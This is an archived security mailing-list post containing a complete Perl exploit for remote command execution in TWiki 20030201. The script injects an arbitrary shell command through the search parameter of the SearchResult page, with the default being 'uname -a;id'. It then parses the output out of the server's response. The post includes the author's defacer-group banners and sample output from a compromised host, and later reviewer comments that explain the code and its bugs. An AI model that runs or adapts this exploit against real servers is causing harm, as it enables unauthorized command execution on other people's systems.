TWiki 20030201 VIEW string remote command execution

From: GeekZsecurityfocus.com, (GeekZsecurityfocus.com)
Date: Sun Nov 06 2005 - 20:29:59 CST


#!/usr/bin/perl
#
# TWiki 20030201 VIEW string remote command execution vulnerability
#
# Exploit coded by runvirus GeekZ[at]WorldDefacers[d0t]NeT
#
#
# [rootlocalhost perls]$ perl twikiview.pl -h www.victim.com -p twiki/bin/view/TWiki/ -c "uname -a;id"
#
#
# -=[ TWiki :- view string remote command execution exploit ]=-
# -=[ Coded by rUnViRuS ]=-
# -=[ HOST:- www.worlddefacers.net www.secuirty-arab.com ]=-
#
# bash-2.05b --> uname -a;id
#
# Linux infong225 2.4.28-grsec-20050113a #1 SMP Thu Jan 13 08:59:31 CET 2005 i686 unknown
# uid=16704(u36561933) gid=600(ftpusers)
#
#

# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
###########################################################################################
use Net::HTTP;
use Getopt::Std; getopts('h:p:c:', \%args);
# Options land in the package-global %args (the file never enables strict):
#   -h  target host, -p  base path of the TWiki bin directory, -c  command.

if (defined($args{'h'})) { $host = $args{'h'}; }
if (defined($args{'p'})) { $path = $args{'p'}; }
# Default command when -c is omitted. The literal spans several source
# lines; the embedded blank line looks like a wrapping artifact from the
# mailing-list archive rather than intended content -- TODO confirm.
if (defined($args{'c'})) { $thecmd = $args{'c'};}else{$thecmd = "

uname -a;id";}
# Banner goes to STDERR so it does not mix with the captured output on STDOUT.
print STDERR "\n-=[ TWiki 20030201 VIEW string remote command

execution vulnerability ]=-\n";
print STDERR "-=[ HOST:- www.worlddefacers.net www.secuirty-

arab.com ]=-\n";
print STDERR "-=[ Coded by rUnViRuS

                ]=-\n\n";

# -h and -p are mandatory; Usage() prints the option summary and exits.
if ((!defined($host)) || (!defined($path))) {
Usage();
}

 print "bash-2.05b --> $thecmd\n\n";
 # NOTE(review): `$;` is Perl's subscript-separator variable, not `$!`, so a
 # failed connection dies with an unhelpful message.
 my $s = Net::HTTP->new(Host => "$host") || die $;
 # Declares a new lexical $thecmd initialised from the package $thecmd above;
 # only the percent-encoded copy is used from here on.
 my $thecmd=URLEncode($thecmd);
 my $count=0;   # number of __BEGIN__ markers found in the response body
 my $skip=0;    # search offset into $buf2 for the marker scan below
 my $buf2;      # accumulated response body

 # Query string carrying the encoded command; the script later looks for
 # __BEGIN__ ... __END__ markers in the response. The unusual search value
 # and those markers are a straightforward detection signature in web-server
 # logs or a WAF. As above, the line breaks inside the literal appear to be
 # wrapping artifacts (a bare newline inside a request line would not be sent
 # intact) -- TODO confirm against the original posting.
 my $exploit="?topic=doesnotexist1%27%3B+%28$thecmd%29+%7C+sed+%27

s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l

+--+%27doesnotexist2";
  $s->write_request(GET => $path . "SearchResult?search=" .

$exploit, 'User-Agent' => "Mozilla/5.0");
 # Status code and headers are read but never checked.
 my($code, $mess, %h) = $s->read_response_headers;

 # ..,,;:: Parsing procedure

 # Read the entire entity body in 1024-byte chunks into $buf2.
 while (1) {
    my $buf;
    my $n = $s->read_entity_body($buf, 1024);
    die "read failed: $!" unless defined $n;
    last unless $n;
    $buf2 = $buf2 . $buf;
 }
    # Scan for every __BEGIN__ ... __END__ pair. The first hit is skipped
    # ($count != 1) and consecutive duplicates are suppressed.
    # NOTE(review): if a __BEGIN__ has no following __END__, index() returns
    # -1, $skip becomes 6, and the same __BEGIN__ is found again on the next
    # pass, so this loop never terminates.
    while (index($buf2,"__BEGIN__",$skip) != -1) {
          $from = index($buf2,"__BEGIN__",$skip);
          $count = $count +1;
          $from = $from + 9;   # length of "__BEGIN__"
          $to = index($buf2,"__END__",$skip);
          $skip = $to+7;       # length of "__END__"
          $chars = $to - $from;
          $grab = substr($buf2, $from, $chars);
          if (($grab ne $oldgrab) && ($count != 1)){
             print "$grab\n";
             }
         $oldgrab = $grab;
        }
 # Zero or one marker means the response did not carry command output.
 if ( $count <= 1 ){
   print "Host not vulnerable\n";
 }

 # ..,,;:: Encoding procedure, lifted from snooq

sub URLEncode {
    # Percent-encode every non-word character (anything outside [A-Za-z0-9_])
    # as %XX with upper-case hex digits; word characters pass through as-is.
    # Takes one string and returns the encoded copy without touching the input.
    my ($text) = @_;
    (my $encoded = $text) =~ s{(\W)}{ sprintf '%%%02X', ord $1 }egx;
    return $encoded;
}

sub Usage {
    # Write the option summary to STDERR, then terminate the script.
    # The literal below is kept byte-for-byte, including its line breaks.
    my $summary = "-=[ Options: twikiview.pl -h www.exmpl.com -p

                ]=-
-=[ -h Victim host .

  ]=-
-=[ -p Twiki path.

  ]=-
-=[ -c Command.

 ]=-\n\n";
    print {*STDERR} $summary;
    exit 0;
}